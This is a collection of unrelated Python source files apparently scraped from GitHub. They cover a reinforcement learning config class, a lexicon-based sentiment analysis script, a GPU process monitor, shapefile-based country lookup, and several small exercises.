new_height\n\n\nbot.run(token)\nlista_dunks.start()","repo_name":"sworfisc/sneaker_monitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41798861386","text":"import copy\nimport dataclasses\nimport enum\nimport logging\nimport pickle\nfrom abc import ABC, abstractmethod\nfrom dataclasses import dataclass, field\nfrom typing import TYPE_CHECKING, Any, List, Optional, Tuple, Type\n\nimport numpy as np\n\nfrom srl.base.define import EnvObservationTypes, RLObservationType, RLTypes\nfrom srl.base.env.env_run import EnvRun, SpaceBase\nfrom srl.base.rl.processor import Processor\nfrom srl.base.spaces.box import BoxSpace\n\nif TYPE_CHECKING:\n from srl.base.rl.algorithms.extend_worker import ExtendWorker\n\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass RLConfig(ABC):\n processors: List[Processor] = field(default_factory=list)\n override_env_observation_type: EnvObservationTypes = EnvObservationTypes.UNKNOWN\n override_action_type: RLTypes = RLTypes.ANY # RL側がANYの場合のみ有効\n\n action_division_num: int = 5\n \"\"\"\n The number of divisions when converting from continuous to discrete values.\n If -1, round by round transform.\n \"\"\"\n # 連続値から離散値に変換する場合の分割数です。-1の場合round変換で丸めます。\n\n observation_division_num: int = -1\n \"\"\"\n The number of divisions when converting from continuous to discrete values.\n If -1, round by round transform.\n \"\"\"\n # 連続値から離散値に変換する場合の分割数です。-1の場合round変換で丸めます。\n\n extend_worker: Optional[Type[\"ExtendWorker\"]] = None\n parameter_path: str = \"\"\n remote_memory_path: str = \"\"\n use_rl_processor: bool = True # RL側のprocessorを使用するか\n\n use_render_image_for_observation: bool = False\n \"\"\" Change state input to render_image. Existing settings will be overwritten. \"\"\"\n # 状態の入力をrender_imageに変更。既存の設定は上書きされます。\n\n # --- Worker Config\n enable_state_encode: bool = True\n enable_action_decode: bool = True\n enable_reward_encode: bool = True\n window_length: int = 1\n dummy_state_val: float = 0.0\n\n # --- other\n enable_sanitize_value: bool = True\n enable_assertion_value: bool = False\n\n def __post_init__(self) -> None:\n self._is_reset = False\n self._run_processors: List[Processor] = []\n self._rl_action_type = self.override_action_type\n\n # The device used by the framework.\n self._used_device_tf: str = \"/CPU\"\n self._used_device_torch: str = \"cpu\"\n\n self._check_parameter = True\n\n def assert_params(self) -> None:\n assert self.window_length > 0\n\n def to_json_dict(self) -> dict:\n d = {}\n for k, v in self.__dict__.items():\n if k.startswith(\"_\"):\n continue\n if v is None or type(v) in [int, float, bool, str]:\n d[k] = v\n elif type(v) in [list, dict, tuple]:\n d[k] = copy.deepcopy(v)\n elif isinstance(v, bytes):\n d[k] = str(v)\n elif issubclass(type(v), enum.Enum):\n d[k] = v.name\n elif dataclasses.is_dataclass(v):\n d[k] = dataclasses.asdict(v)\n else:\n d[k] = str(v)\n return d\n\n # ----------------------------\n # RL config\n # ----------------------------\n @abstractmethod\n def getName(self) -> str:\n raise NotImplementedError()\n\n @property\n @abstractmethod\n def base_action_type(self) -> RLTypes:\n raise NotImplementedError()\n\n @property\n @abstractmethod\n def base_observation_type(self) -> RLTypes:\n raise NotImplementedError()\n\n @abstractmethod\n def get_use_framework(self) -> str:\n raise NotImplementedError()\n\n def set_config_by_env(self, env: EnvRun) -> None:\n pass # NotImplemented\n\n def set_config_by_actor(self, actor_num: int, actor_id: int) -> None:\n pass # NotImplemented\n\n def set_processor(self) -> List[Processor]:\n return [] # NotImplemented\n\n @property\n def info_types(self) -> dict:\n \"\"\"infoの情報のタイプを指定、出力形式等で使用を想定\n 各行の句は省略可能\n name : {\n \"type\": 型を指定(None, int, float, str)\n \"data\": 以下のデータ形式を指定\n \"ave\" : 平均値を使用(default)\n \"last\": 最後のデータを使用\n \"min\" : 最小値\n \"max\" : 最大値\n }\n \"\"\"\n return {} # NotImplemented\n\n # ----------------------------\n # reset config\n # ----------------------------\n def reset(self, env: EnvRun, is_logger: bool = True) -> None:\n if self._is_reset:\n return\n self._check_parameter = False\n\n if is_logger:\n logger.info(f\"--- {self.getName()}\")\n logger.info(f\"max_episode_steps : {env.max_episode_steps}\")\n logger.info(f\"player_num : {env.player_num}\")\n logger.info(f\"observation_type(env) : {env.observation_type}\")\n logger.info(f\"observation_space(env): {env.observation_space}\")\n\n # env property\n self.env_max_episode_steps = env.max_episode_steps\n self.env_player_num = env.player_num\n\n self._env_action_space = env.action_space # action_spaceはenvを使いまわす\n rl_observation_space = env.observation_space\n rl_env_observation_type = env.observation_type\n\n # -----------------------\n # observation\n # -----------------------\n\n # --- observation_typeの上書き\n if self.override_env_observation_type != EnvObservationTypes.UNKNOWN:\n rl_env_observation_type = self.override_env_observation_type\n if is_logger:\n logger.info(f\"override observation type: {rl_env_observation_type}\")\n\n self._run_processors = []\n if self.enable_state_encode:\n # --- add processor\n if self.use_render_image_for_observation:\n from srl.rl.processors.render_image_processor import RenderImageProcessor\n\n self._run_processors.append(RenderImageProcessor())\n self._run_processors.extend(self.processors)\n if self.use_rl_processor:\n self._run_processors.extend(self.set_processor())\n\n # --- processor\n for processor in self._run_processors:\n rl_observation_space, rl_env_observation_type = processor.preprocess_observation_space(\n rl_observation_space,\n rl_env_observation_type,\n env,\n self,\n )\n if is_logger:\n logger.info(f\"processor obs space: {rl_observation_space}\")\n logger.info(f\"processor obs type : {rl_env_observation_type}\")\n\n # --- window_length\n self._one_observation = rl_observation_space\n if self.window_length > 1:\n rl_observation_space = BoxSpace(\n (self.window_length,) + self._one_observation.shape,\n np.min(self._one_observation.low),\n np.max(self._one_observation.high),\n )\n if is_logger:\n logger.info(f\"window_length obs space: {rl_observation_space}\")\n\n self._rl_observation_space = rl_observation_space\n self._rl_env_observation_type = rl_env_observation_type\n\n # --- obs type\n # 優先度\n # 1. RL\n # 2. obs_space\n rl_obs_type = self.base_observation_type\n if rl_obs_type == RLTypes.ANY:\n rl_obs_type = self._rl_observation_space.rl_type\n self._rl_observation_type = rl_obs_type\n\n # check type\n _f = False\n if rl_obs_type == RLTypes.DISCRETE:\n if rl_env_observation_type not in [\n EnvObservationTypes.DISCRETE,\n EnvObservationTypes.SHAPE3,\n EnvObservationTypes.SHAPE2,\n ]:\n _f = True\n if _f:\n if is_logger:\n logger.warning(f\"EnvType and RLType do not match. {rl_env_observation_type} != {rl_obs_type}\")\n\n # -----------------------\n # action type\n # -----------------------\n # 優先度\n # 1. RL\n # 2. override_action_type\n # 3. action_space\n rl_action_type = self.base_action_type\n if rl_action_type == RLTypes.ANY:\n rl_action_type = self.override_action_type\n if rl_action_type == RLTypes.ANY:\n rl_action_type = self._env_action_space.rl_type\n self._rl_action_type = rl_action_type\n\n # --- base obs type\n base_obs_type = self.base_observation_type\n if base_obs_type == RLTypes.ANY:\n base_obs_type = self._rl_observation_space.rl_type\n\n # --- division\n # RLが DISCRETE で Space が CONTINUOUS なら分割して DISCRETE にする\n if (self._rl_action_type == RLTypes.DISCRETE) and (self._env_action_space.rl_type == RLTypes.CONTINUOUS):\n self._env_action_space.create_division_tbl(self.action_division_num)\n if (base_obs_type == RLTypes.DISCRETE) and (self._rl_observation_space.rl_type == RLTypes.CONTINUOUS):\n self._rl_observation_space.create_division_tbl(self.observation_division_num)\n\n # --- set rl property\n if self._rl_action_type == RLTypes.DISCRETE:\n self._action_num = self.action_space.n\n self._action_low = np.ndarray(0)\n self._action_high = np.ndarray(self._action_num - 1)\n else:\n # ANYの場合もCONTINUOUS\n self._action_num = self.action_space.list_size\n self._action_low = np.array(self.action_space.list_low)\n self._action_high = np.array(self.action_space.list_high)\n\n # --- option\n self.set_config_by_env(env)\n\n self._is_reset = True\n if is_logger:\n logger.info(f\"action_space(env) : {self._env_action_space}\")\n logger.info(f\"action_type(rl) : {self._rl_action_type}\")\n logger.info(f\"observation_env_type(rl): {self._rl_env_observation_type}\")\n logger.info(f\"observation_type(rl) : {self._rl_observation_type}\")\n logger.info(f\"observation_space(rl) : {self._rl_observation_space}\")\n\n def __setattr__(self, name, value):\n if name == \"_is_reset\":\n object.__setattr__(self, name, value)\n return\n\n if hasattr(self, \"_check_parameter\"):\n if self._check_parameter and not hasattr(self, name):\n logger.warning(f\"An undefined variable was assigned. {name}={value}\")\n\n # configが書き変わったら reset が必要\n if name in [\n \"processors\",\n \"override_env_observation_type\",\n \"override_action_type\",\n \"action_division_num\",\n \"use_render_image_for_observation\",\n \"use_rl_processor\",\n \"enable_state_encode\",\n \"enable_action_decode\",\n \"window_length\",\n ]:\n self._is_reset = False\n object.__setattr__(self, name, value)\n\n # ----------------------------\n # utils\n # ----------------------------\n @property\n def name(self) -> str:\n return self.getName()\n\n @property\n def is_reset(self) -> bool:\n return self._is_reset\n\n @property\n def run_processors(self) -> List[Processor]:\n return self._run_processors\n\n @property\n def used_device_tf(self) -> str:\n return self._used_device_tf\n\n @property\n def used_device_torch(self) -> str:\n return self._used_device_torch\n\n @property\n def action_space(self) -> SpaceBase:\n return self._env_action_space\n\n @property\n def action_type(self) -> RLTypes:\n return self._rl_action_type\n\n @property\n def observation_space(self) -> SpaceBase:\n return self._rl_observation_space\n\n @property\n def observation_shape(self) -> Tuple[int, ...]:\n return self._rl_observation_space.shape\n\n @property\n def observation_type(self) -> RLTypes:\n return self._rl_observation_type\n\n @property\n def env_observation_type(self) -> EnvObservationTypes:\n return self._rl_env_observation_type\n\n def copy(self, reset_env_config: bool = False) -> Any:\n config = self.__class__()\n config._check_parameter = False\n\n for k, v in self.__dict__.items():\n if isinstance(v, EnvRun):\n continue\n try:\n setattr(config, k, pickle.loads(pickle.dumps(v)))\n except TypeError as e:\n logger.warning(f\"'{k}' copy fail.({e})\")\n\n if reset_env_config:\n config._is_reset = False\n else:\n config._is_reset = self._is_reset\n return config\n\n def create_dummy_state(self, is_one: bool = False) -> RLObservationType:\n if is_one:\n return np.full(self._one_observation.shape, self.dummy_state_val, dtype=np.float32)\n else:\n return np.full(self.observation_shape, self.dummy_state_val, dtype=np.float32)\n\n # ----------------------------------\n # rl use property(reset後に使えます)\n # ----------------------------------\n @property\n def action_num(self) -> int:\n return self._action_num\n\n @property\n def action_low(self) -> np.ndarray:\n return self._action_low\n\n @property\n def action_high(self) -> np.ndarray:\n return self._action_high\n\n\n@dataclass\nclass DummyConfig(RLConfig):\n name: str = \"dummy\"\n\n @property\n def base_action_type(self) -> RLTypes:\n return RLTypes.ANY\n\n @property\n def base_observation_type(self) -> RLTypes:\n return RLTypes.ANY\n\n def get_use_framework(self) -> str:\n return \"\"\n\n def getName(self) -> str:\n return self.name\n","repo_name":"pocokhc/simple_distributed_rl","sub_path":"srl/base/rl/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":13902,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"71886312054","text":"# liu hu lexicon sentiment analysis\n# adapted from http://www.nltk.org/_modules/nltk/sentiment/util.html - demo_liu_hu_lexicon\nfrom nltk.corpus import opinion_lexicon\nfrom nltk.tokenize import treebank\ntokenizer = treebank.TreebankWordTokenizer()\n\ndef sentiment_liu_hu(text):\n pos_words = 0\n neg_words = 0\n tokenized_sent = [word.lower() for word in tokenizer.tokenize(text)]\n\n for word in tokenized_sent:\n if word in opinion_lexicon.positive():\n pos_words += 1\n elif word in opinion_lexicon.negative():\n neg_words += 1\n\n if pos_words > neg_words:\n return 1\n elif pos_words < neg_words:\n return -1\n elif pos_words == neg_words:\n return 0\n\n# assigning only positive and negative may be too rash, we should somehow take into account the number \n# of words and the difference between the number of positive words and the number of negative words\ndef sentiment_liu_hu_mod(text):\n pos_words = 0\n neg_words = 0\n tokenized_sent = [word.lower() for word in tokenizer.tokenize(text)]\n\n for word in tokenized_sent:\n if word in opinion_lexicon.positive():\n pos_words += 1\n elif word in opinion_lexicon.negative():\n neg_words += 1\n \n return (pos_words - neg_words)/len(tokenized_sent)\n\n# load from pickle\ncountries_dict = pickle.load( open( \"countries_dict.p\", \"rb\" ) )\n\ncountry_sentiment_liu = {}\ncountry_sentiment_liu_mod = {}\ncountry_count = {}\nemail_num = 1\nnum_emails = len(emails.ExtractedBodyText)\n\n# Step 1 - compute cumulative scores and number of mentions\nfor text in emails.ExtractedBodyText:\n \n #debug info\n if email_num % 1000 == 0:\n print(\"Email number %d/%d\" % (email_num,num_emails))\n email_num += 1\n \n if text is not np.nan: # skip text if invalid\n # split text into lines\n lines_list = tokenize.sent_tokenize(text)\n # for each line search for countries and perform sentiment \"analysis\"\n for line in lines_list:\n countries_found = None\n countries_found = list(set([countries_dict[c] for c in countries_dict.keys() if c in line]))\n if countries_found is not None: # if found country, perform sentiment analysis\n score = sentiment_liu_hu_mod(line)\n # update score for each country\n for country in countries_found:\n try:\n country_sentiment_liu_mod[country] += score\n country_sentiment_liu[country] += np.sign(score)\n country_count[country] += 1\n except: # if country not yet in dictionary\n country_sentiment_liu_mod[country] = score\n country_sentiment_liu[country] = np.sign(score)\n country_count[country] = 1","repo_name":"BeforeRain/AppliedDataAnalysis","sub_path":"05 - Taming Text/liu_hu_sentiment_analysis.py","file_name":"liu_hu_sentiment_analysis.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30113791905","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 11 08:41:20 2022\n\n@author: juani\n\"\"\"\n\n#8.7\nimport csv\n\nfrom fileparse import parse_csv\n\ndef leer_camion(archivo):\n with open(archivo) as f:\n contenido_camion= parse_csv(f, has_headers=True)\n return contenido_camion\n\n\ndef leer_precios(archivo):\n with open(archivo) as f:\n lista_precios= parse_csv(f, has_headers=False)\n return lista_precios\n\n\ndef imprimir_informe(nombre_archivo1,nombre_archivo2):\n camion = leer_camion(nombre_archivo1)\n precios = leer_precios(nombre_archivo2)\n headers = ('Nombre', 'Cajones', 'Precio', 'Cambio')\n sep = ('----------')\n print(f'{headers[0]:>10s} {headers[1]:>10s} {headers[2]:>10s} {headers[3]:>10s}')\n print(f'{sep:>10s} {sep:>10s} {sep:>10s} {sep:>10s}')\n for s in camion:\n lista = ((s['nombre'], s['cajones'], '$' + str(s['precio']), precios[0][1] - s['precio']))\n print('%10s %10d %10s %10.2f' % lista)\n\n \n# def informe_camion(nombre_archivo_camion, nombre_archivo_precios):\n# leer_camion(nombre_archivo_camion)\n# leer_precios(nombre_archivo_precios)\n# imprimir_informe(nombre_archivo_camion, nombre_archivo_precios)\n\n# camion=leer_camion('../Data/camion.csv')\n\n# precio=leer_precios('../Data/precios.csv')\ninforme=imprimir_informe('../Data/camion.csv','../Data/precios.csv')\n# informe_camion('../Data/fecha_camion.csv','../Data/precios.csv')","repo_name":"juanamolinalucia2001/python2C-unsam2022","sub_path":"Clase08/informe_final.py","file_name":"informe_final.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73177556211","text":"import media\r\nimport fresh_tomatoes\r\n\r\n#Information about toy story\r\ntoy_story = media.Movie(\"Toy Story\",\r\n \"A story of a by and his toys that can\",\r\n \"http://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg\",\r\n \"https://www.youtube.com/watch?v=KYz2wyBy3kc\")\r\n#Information about avatar\r\navatar = media.Movie(\"Avatar\",\r\n \"Avatar is a 2009 American science fiction adventure movie\",\r\n \"https://images-na.ssl-images-amazon.com/images/M/MV5BMTYwOTEwNjAzMl5BMl5BanBnXkFtZTcwODc5MTUwMw@@._V1_.jpg\",\r\n \"https://www.youtube.com/watch?v=5PSNL1qE6VY&t=2s\")\r\n\r\n#Information about hunger games\r\nhunger_games = media.Movie(\"Hunger Games\",\r\n \"This article is about the book series. \",\r\n \"https://images-na.ssl-images-amazon.com/images/M/MV5BMjA4NDg3NzYxMF5BMl5BanBnXkFtZTcwNTgyNzkyNw@@._V1_SY1000_CR0,0,674,1000_AL_.jpg\",\r\n \"https://www.youtube.com/watch?v=mfmrPu43DF8\")\r\n#Information about la la land\r\nla_la_land = media.Movie(\"La la land\",\r\n \"La La Land is a 2016 American musical romantic comedy-drama film\",\r\n \"https://images-na.ssl-images-amazon.com/images/M/MV5BMzUzNDM2NzM2MV5BMl5BanBnXkFtZTgwNTM3NTg4OTE@._V1_SY1000_SX675_AL_.jpg\",\r\n \"https://www.youtube.com/watch?v=0pdqf4P9MB8\")\r\n#Information about John wick\r\njohn_wick = media.Movie(\"John Wick\",\r\n \" Chapter 1, is a 2014 American neo-noir action thriller film\",\r\n \"https://images-na.ssl-images-amazon.com/images/M/MV5BMTU2NjA1ODgzMF5BMl5BanBnXkFtZTgwMTM2MTI4MjE@._V1_SY1000_CR0,0,666,1000_AL_.jpg\",\r\n \"https://www.youtube.com/watch?v=2AUmvWm5ZDQ\")\r\n#Information about John wick\r\nthe_best_of_me = media.Movie(\"The Best Of Me\",\r\n \"The Best of Me is a 2014 American romantic drama film \",\r\n \"https://upload.wikimedia.org/wikipedia/en/6/68/The_Best_of_Me_poster.jpg\",\r\n \"https://www.youtube.com/watch?v=cQszhfoP_WI\")\r\n\r\n\r\nmovies = [toy_story, avatar, hunger_games,la_la_land,john_wick,the_best_of_me]\r\nfresh_tomatoes.open_movies_page(movies)\r\n","repo_name":"BasmaAshraf21/Movie-website","sub_path":"Movie-website/entertainment.py","file_name":"entertainment.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86413706793","text":"#!/usr/bin/env python3\nimport fileinput\nimport re\n\n\ndef cross_join(strs1, strs2):\n result = set()\n for str1 in strs1:\n for str2 in strs2:\n result.add(str1 + str2)\n return result\n\n\ninput = fileinput.input()\n\nrules = []\nfor line in input:\n if not line.strip():\n break\n rules.append(line.strip())\n\ngraph = {}\nwhile rules:\n next_rules = []\n for rule in rules:\n rule_match = re.fullmatch(r'(\\d+): (.+)', rule)\n rule_no = int(rule_match[1])\n\n character_rule_match = re.fullmatch(r'\"(\\w+)\"', rule_match[2])\n if character_rule_match:\n graph[rule_no] = {character_rule_match[1]}\n else:\n reference_rules = []\n for r in rule_match[2].split(' | '):\n reference_rules.append(list(map(int, r.split(' '))))\n\n if all((r in graph) for r in sum(reference_rules, [])):\n str_rules = []\n for ref_rule in reference_rules:\n str_rules.append(list(map(graph.get, ref_rule)))\n\n new_rule = set()\n for str_rule in str_rules:\n strs = str_rule[0]\n for r in str_rule[1:]:\n strs = cross_join(strs, r)\n new_rule.update(strs)\n graph[rule_no] = new_rule\n else:\n next_rules.append(rule)\n rules = next_rules\n\nwords = set()\nfor rule_words in graph.values():\n words.update(rule_words)\n\nresult = 0\nfor line in input:\n if line.strip() in words:\n result += 1\nprint(result)\n","repo_name":"jupblb/aoc-2020","sub_path":"day19/solve1.py","file_name":"solve1.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30357944283","text":"# Frames por segundo\nfps = 32\n\n# Dimensões do Game\nWIDTH = 1000\nHEIGHT = 1000\n\n# Variáveis do game\ntile_size = 50\ngame_over = 0\nmain_menu = True\nlevel = 0\nmax_levels = 7\nscore = 0\n\n# Definir cores\nWHITE = (255, 255, 255)\nBROWN = (82, 48, 6)","repo_name":"the-akira/CC33Z","sub_path":"Cursos/Desenvolvimento de Games 2D/Games/Platformer/Game/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"pt","doc_type":"code","stars":57,"dataset":"github-code","pt":"21"} +{"seq_id":"36720173486","text":"from shapely.geometry import Point, Polygon\nimport shapefile\n\n\n# Function to locate Country with latitude and longitude\n# Argument as coordinates longitude, latitude, and file path of shapefile\n# Return value as Country name\ndef locate_country(lon, lat, country_fp):\n # Read the shapefile\n crf = shapefile.Reader(country_fp)\n\n # Returns a list of Shape objects describing the geometry of\n # each shape record\n shapes_countries = crf.shapes()\n country_polygons = {}\n\n for i, record in enumerate(crf.records()):\n # The border is at the position of index 3\n country_polygons[record[1]] = Polygon(shapes_countries[i].points)\n\n # Make the lat and lon a Point object\n pt = Point(lon, lat) # appears that longitude first, latitude second\n this_country = \"\"\n for c, p in country_polygons.items():\n # Check if p contains the point\n if p.contains(pt):\n this_country = c\n break\n\n return this_country\n\n\n# Function to locate State with latitude and longitude\n# Argument as coordinates longitude, latitude, and file path of shapefile\n# Return value as State name\ndef locate_state(lon, lat, state_fp):\n # Read the shapefile and store the\n sf = shapefile.Reader(state_fp)\n\n # Returns a list of Shape objects describing the geometry of\n # each shape record\n shapes_states = sf.shapes()\n state_polygons = {}\n\n for i, record in enumerate(sf.records()):\n # The boarder is at the position of index 5\n state_polygons[record[5]] = Polygon(shapes_states[i].points)\n\n # Make the lat and lon a Point object\n pt = Point(lat, lon)\n this_state = \"\"\n for s, p in state_polygons.iteritems():\n # Check if p contains the point\n if p.contains(pt):\n this_state = s\n break\n\n return this_state\n\n\n# Function to locate County with latitude and longitude\n# Argument as coordinates longitude, latitude, and file path of shapefile\n# Return value as County name\ndef locate_county(lon, lat, county_fp):\n # Read the shapefile\n cf = shapefile.Reader(county_fp)\n\n # Returns a list of Shape objects describing the geometry of\n # each shape record\n shapes_counties = cf.shapes()\n\n county_polygons = {}\n # print(cf.records())\n for i, record in enumerate(cf.records()):\n # The boarder is at the position of index 5\n county_polygons[record[5]] = Polygon(shapes_counties[i].points)\n\n # Make the lat and lon a Point object\n pt = Point(lat, lon)\n this_county = \"\"\n\n for c, p in county_polygons.iteritems():\n # Check if p contains the point\n if p.contains(pt):\n this_county = c\n break\n\n return this_county\n\n\n# Testing the above functions\n# test_coord = Point(-86.990100, 40.332937)\n# print(locate_state(45.016302, -79.609751, 'C:/_Study/crowdsourcing/tl_2017_us_state/tl_2017_us_state'))\n# print locate(40.332937, -86.990100, \"venv/shapefiles/ne_110m_admin_0_countries/ne_110m_admin_0_countries\",\n# \"venv/shapefiles/tl_2017_us_state/tl_2017_us_state\", \"venv/shapefiles/tl_2016_us_county/tl_2016_us_county\")\nprint(locate_country(-80.2358746, 26.224614, 'maps/world_countries_2017'))\n","repo_name":"magickaiyang/tweet_locality","sub_path":"find_boundary.py","file_name":"find_boundary.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2292751873","text":"# -*- encoding: utf-8 -*-\n# @Time : 2019/2/27 16:10\n\nimport os\nimport numpy as np\nfrom PIL import Image\n\n# Folder_path = 'D:/Dataset/Hand Pose 2d to 3d/STB/B1Random/'\nFolder_path = '/Volumes/YF-Code-256/Data/STB/B1Counting/'\nfile_name = 'SK_depth_0.png'\nimage = Image.open(os.path.join(Folder_path, file_name)).convert('RGB')\nprint(type(image))\nprint((image.size))\n# image.show()\nRGB = np.array(image)\nprint(RGB.shape)\nprint(RGB[240][320])\nRGB[:,:,1] = 0\nim = Image.fromarray(RGB)\nim.show()\nDepth = RGB[:,:,1] * 256 + RGB[:,:,0]\nde = Image.fromarray(np.uint8(Depth / np.max(Depth) *255))\nde.show()","repo_name":"yunfanLu/VAE-Pose","sub_path":"VaePose/UnitTest/ImageTest.py","file_name":"ImageTest.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"40225663132","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Read image from file in gray scale mode and convert to numpy array\nimg = np.array(cv2.imread(\"11.png\", cv2.IMREAD_GRAYSCALE))\nsrc = np.array(cv2.imread(\"22.png\", cv2.IMREAD_GRAYSCALE))\nimg2 = cv2.equalizeHist(img, src)\nplt.subplot(231)\nplt.imshow(img, cmap='gray')\nplt.subplot(234)\nplt.hist(img.ravel(), bins=256, range=[0, 256])\nplt.subplot(232)\nplt.imshow(src, cmap='gray')\nplt.subplot(235)\nplt.hist(src.ravel(), bins=256, range=[0, 256])\nplt.subplot(233)\nplt.imshow(img2, cmap='gray')\nplt.subplot(236)\nplt.hist(img2.ravel(), bins=256, range=[0, 256])\nplt.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9, wspace=0.4, hspace=0.4)\nplt.show()\n","repo_name":"Nourollah/Python_ImageProcessing","sub_path":"S02/S02_C14_P57_histogram_matching.py","file_name":"S02_C14_P57_histogram_matching.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"43352828652","text":"#coding=utf-8\nimport os\nimport sys\nimport pwd\nimport time\nimport psutil\nimport subprocess\nimport operator\nimport argparse\n\ndef is_cuda_avaiable():\n try:\n n = str(subprocess.check_output([\"nvidia-smi\", \"-L\"])).count('UUID')\n except Exception as e:\n n = 0\n return n\n\ndef clear():\n #print(\"\\033[H\\033[J\")()\n sys.stdout.write(\"\\x1b[2J\\x1b[H\")\n\ndef get_owner(pid):\n try:\n for line in open('/proc/%d/status' % pid):\n if line.startswith('Uid:'):\n uid = int(line.split()[1])\n return pwd.getpwuid(uid).pw_name\n except:\n return None\n\ndef get_cmd(pid):\n process=psutil.Process(int(pid))\n cmd=process.cwd()\n for e in process.cmdline():\n cmd+=\" \"+e\n return cmd\n\ndef is_train(name):\n trains=[\"python\",\"caffe\",\"python3\"]\n for train in trains:\n if name.find(train) >= 0:\n return True\n return False\n\ndef get_info(verbose=True):\n gpus=[]\n msg = subprocess.Popen('nvidia-smi', stdout = subprocess.PIPE).stdout.read().decode()\n msg = msg.strip().split('\\n')\n lino = 0\n seen = 0\n while True:\n if '|=' in msg[lino]:\n seen +=1\n if seen == 2:\n lino += 1\n break\n if '| Processes:' in msg[lino]:\n infos = msg[lino+1].split()\n pidpos = infos.index('PID')\n gpupos = infos.index('GPU')\n lino += 1\n maps={}\n while lino < len(msg) -1:\n line = msg[lino]\n items = line.split()\n pid = items[pidpos]\n gpuid = items[gpupos]\n mem_usage = items[-2][:-3]\n if pid in maps.keys():\n maps[pid]=str(gpuid)+\",\"+maps[pid]\n else:\n maps[pid]=str(gpuid)+\"\\t\"+pid+\"\\t\"+mem_usage+\"M\"\n lino += 1\n maps=sorted(maps.items(),key=operator.itemgetter(1),reverse=True)\n lines=[]\n for pid in maps:\n try:\n cmd = get_cmd(pid[0])\n if(is_train(cmd)):\n line=pid[1]+\"\\t\"+cmd\n lines.append((line))\n except Exception as e:\n pass\n lines.reverse()\n line=\"\"\n for i,g in enumerate(gpus):\n line+=str(i)+\":\"+g+\" \\t\"\n if i % 4 == 3:\n line+=\"\\n\"\n if verbose:\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime()))\n #print(line[:-1])\n print(\"gpu\\tpid\\tmemusage\\tdir\\tcmd\")\n runs=[]\n for line in lines:\n runs.append(line)\n if verbose:\n print(line)\n return runs\n\ndef gtop():\n while True:\n runs=get_info(False)\n clear()\n print(time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime()))\n for run in runs:\n print(run)\n\ndef write2log(line,path=\"gpu.log\"):\n with open(path,\"a+\") as f:\n f.write(line+\"\\n\")\n\ndef gm():\n allruns={}\n while True:\n runs=get_info(False)\n if len(allruns)==0:\n for run in runs:\n rp=run.split(\" \")[1]\n allruns[rp]=run\n else:\n rps=[]\n for run in runs:\n rp=run.split(\" \")[1]\n rps.append(rp)\n \n for r in list(allruns.keys()):\n if r not in rps:\n run=allruns[r]\n line=time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())+\" \"+run+\" closed\"\n print(line)\n write2log(line)\n del allruns[r]\n \n for i in range(len(rps)):\n run=runs[i]\n if not allruns.has_key(rps[i]):\n line=time.strftime(\"%Y-%m-%d %H:%M:%S\",time.localtime())+\" \"+run+\" created\"\n print(line)\n write2log(line)\n allruns[rps[i]]=runs[i]\n\ndef get_args():\n args=argparse.ArgumentParser()\n args.add_argument(\"-m\", \"--gm\", default=False,help=\"monitor\")\n args.add_argument(\"-t\", \"--gtop\", default=False,help=\"monitor\")\n args.add_argument(\"-g\", \"--info\", default=True,help=\"monitor\")\n return args.parse_args()\n\nif __name__ == \"__main__\":\n args=get_args()\n if not is_cuda_avaiable():\n print(\"There seems no gpu available.\")\n exit(0)\n if args.gm:\n gm()\n elif args.gtop:\n gtop()\n else:\n get_info()","repo_name":"imistyrain/mrcv","sub_path":"mrcv/gpu.py","file_name":"gpu.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"13389738930","text":"from tkinter import *\r\nwindow = Tk()\r\n\r\n'''\r\nconfig the widget in the window\r\n'''\r\ndef button_func():\r\n button1.config(text = 'howdy')\r\n\r\n'''\r\nuse the command to make a call back function\r\n'''\r\n\r\n\r\nbutton1 = Button(window,text = 'haha',command = button_func)\r\nbutton1.pack()\r\n\r\nwindow.mainloop()\r\n","repo_name":"chuyuanver/notes-for-tkinter","sub_path":"tkinter_test/tkinter_test2.py","file_name":"tkinter_test2.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31791655101","text":"# 년원일(yyyy.mm.dd)를 입력받아 일월년(dd-mm-yyyy)로 출력\n# 한 자리 일/월은 0을 붙여 두자리로 출력\n\ny, m, d = input().split('.')\nif (len(m) == 1):\n m = '0' + m\nif (len(d) == 1):\n d = '0' + d\n\nprint('{}-{}-{}'.format(d, m, y))\n\n# tip : 삼항연산자 이용\n# m = '0' + m if len(m) == 1 else m\n# d = '0' + d if len(d) == 1 else 